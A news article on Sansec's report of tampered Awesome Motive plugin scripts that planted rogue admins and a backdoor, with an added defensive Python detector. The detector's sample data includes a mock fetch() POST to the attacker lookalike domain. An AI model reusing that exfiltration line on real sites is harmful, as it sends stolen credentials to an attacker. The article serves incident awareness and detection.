As many as 1.2 million sites pulled malicious code from a trusted vendor's delivery network after attackers tampered with JavaScript used by popular WordPress plugins, Dutch security firm Sansec reported on June 13.
OptinMonster, TrustPulse and PushEngage: the immediate victims
Sansec identified the injection in the JavaScript served for OptinMonster, TrustPulse and PushEngage, three plugins published by WordPress vendor Awesome Motive. Because the altered files were delivered from the vendor's own network, every site loading those scripts received the tampered files straight from the source. Nothing on the victim's own server was modified, so a file-integrity scan of the site alone would not have revealed the change.
Sansec said the payload remains dormant until a logged-in administrator loads a page, so ordinary visitors are untouched for the moment. That design keeps the compromise out of sight on most page loads while still letting the attacker target the highest-value account on each site.
Tampered script behavior: rogue admin accounts, a stealth backdoor and credential exfiltration
According to Sansec's analysis, once a logged-in administrator is detected the malicious script creates a new administrator account on the compromised site, installs a self-hiding backdoor plugin to retain access, and then transmits the new credentials to tidio[.]cc, a lookalike of the legitimate chat service tidio.com. Sansec specifically warned site operators to watch for unfamiliar administrator accounts and for traffic to tidio[.]cc as indicators of compromise.
OptinMonster alone runs on more than one million sites; TrustPulse and PushEngage add further installs. Sansec warned that because the attacker effectively gains control of each compromised site, abuse of regular visitors is likely to follow.
Delivery network compromise and uncertain entry points
The malicious code was served through Awesome Motive's delivery network rather than being planted directly on victim servers. Sansec noted three possible entry points for the attackers: Awesome Motive's own servers, its CDN account, or, less likely, the BunnyNet network used behind the scenes. The firm did not determine which of those was actually exploited.
Sansec's telemetry shows a short, observable window for some of the tampered files: the OptinMonster and TrustPulse scripts were logged serving malicious content for about half an hour late on June 12 before the altered files disappeared, which suggests the vendor detected and reverted the changes. The PushEngage script was still serving malware on June 13, per Sansec's report.
Awesome Motive's reach and the potential scale of impact
While only the three plugins above are confirmed compromised, Awesome Motive's portfolio extends much further. Sansec cited additional products with very large install counts: WPForms with more than six million installs, All in One SEO on around three million sites, and MonsterInsights on roughly two million sites. None of those plugins is a confirmed hit in this campaign, but their presence underscores the potential breadth of impact if the underlying delivery infrastructure were abused.
Sansec likened the campaign to the 2024 Polyfill attack, in which a single poisoned upstream file affected thousands of downstream sites — a comparison intended to highlight how a single compromised source can cascade across a large portion of the web.
What this means for technologists, procurement leaders, and end users
- Technologists and security teams: Sansec urged operators running Awesome Motive plugins to monitor for unfamiliar administrator accounts and for outbound traffic to tidio[.]cc, and to act quickly if either indicator appears.
- Procurement and platform owners: The incident illustrates how a vendor with a wide install base can increase downstream risk; the vendor's footprint (tens of millions of sites, per Sansec's description) is a relevant factor when assessing supply-chain exposure.
- End users and site visitors: While ordinary visitors were reportedly untouched "for now," Sansec warned that abuse of regular visitors is likely to follow once an attacker controls a site, making compromised site detection and remediation time-critical.
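As an added example (not code from the article, from Sansec or from Awesome Motive), the following Python script turns the indicators above into checks an operator can run: it inspects a copy of the plugin's JavaScript for the tidio[.]cc lookalike domain and for any change against a pinned known-good hash, diffs the site's administrator list against a recorded baseline, and compares plugin directories on disk with the plugins WordPress reports, since a backdoor plugin that hides itself from the dashboard still has to exist on the filesystem. The sample script bytes, user lists and plugin lists are constructed for the example; the WP-CLI commands named in comments are assumptions about how an operator would gather the live data.

```python
"""Added example: IOC and integrity checks for sites loading Awesome Motive
scripts. Inputs below are constructed; replace them with live data."""
import hashlib
import re
from typing import Iterable, List, Optional

# Indicator named in Sansec's report: lookalike of the legitimate tidio.com.
IOC_DOMAINS = {"tidio.cc"}

# Host-like tokens, so "tidio.com" (legitimate) and "tidio.cc" (indicator)
# are told apart instead of grepping for the bare word "tidio".
_HOST_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}", re.IGNORECASE)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_script(content: bytes, pinned_sha256: Optional[str] = None) -> dict:
    """Report IOC domain hits and whether the file still matches a pinned hash.

    Pin the hash of a copy you have reviewed; any later mismatch means the
    upstream file changed and deserves a look even if no IOC is present."""
    text = content.decode("utf-8", errors="replace")
    # Assumed evasion (not described in the report): join simple string
    # concatenations such as "tidio" + ".cc" before matching.
    dequoted = re.sub(r"['\"]\s*\+\s*['\"]", "", text)
    hosts = {h.lower() for h in _HOST_RE.findall(dequoted)}
    hits = sorted(
        h for h in hosts
        if h in IOC_DOMAINS or any(h.endswith("." + d) for d in IOC_DOMAINS)
    )
    digest = sha256_hex(content)
    return {
        "sha256": digest,
        "hash_matches_pin": pinned_sha256 is None or digest == pinned_sha256,
        "ioc_hits": hits,
    }


def unfamiliar_admins(current_admins: Iterable[dict], baseline_logins: Iterable[str]) -> List[str]:
    """Administrator logins present now but absent from the recorded baseline.

    current_admins is assumed to be the parsed output of
    `wp user list --role=administrator --format=json`."""
    known = {login.lower() for login in baseline_logins}
    return sorted(u["user_login"] for u in current_admins
                  if u["user_login"].lower() not in known)


def hidden_plugins(on_disk_dirs: Iterable[str], reported_slugs: Iterable[str]) -> List[str]:
    """Plugin directories under wp-content/plugins that WordPress does not
    report (assumed gathered via `wp plugin list --field=name`). A plugin that
    filters itself out of the dashboard list shows up here."""
    reported = {s.lower() for s in reported_slugs}
    return sorted(d for d in on_disk_dirs if d.lower() not in reported)


if __name__ == "__main__":
    # Constructed sample data, not real vendor files or real site state.
    reviewed_copy = b'var s=document.createElement("script");s.src="https://widget.tidio.com/x.js";'
    pinned = sha256_hex(reviewed_copy)
    fetched_now = b'fetch("https://tidio" + ".cc/api", {method:"POST"});'
    print("script:", scan_script(fetched_now, pinned))
    print("new admins:", unfamiliar_admins(
        [{"user_login": "admin"}, {"user_login": "wpsupport"}], ["admin"]))
    print("hidden plugins:", hidden_plugins(
        ["optinmonster", "wp-core-helper"], ["optinmonster"]))
```

Run the hash check against the vendor URL each plugin embeds on a schedule; the half-hour window Sansec observed for two of the files means an hourly check can miss a short-lived swap, so keep the administrator and plugin diffs as well, since the account and backdoor persist after the upstream file is restored.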
Sansec's report raises a central unanswered operational question: which specific part of the vendor delivery chain was breached — Awesome Motive's servers, its CDN account, or BunnyNet — and how quickly was the issue contained across the vendor's ecosystem? Infosecurity has reached out to Awesome Motive for comment.
https://www.infosecurity-magazine.com/news/wordpress-plugin-supply-chain/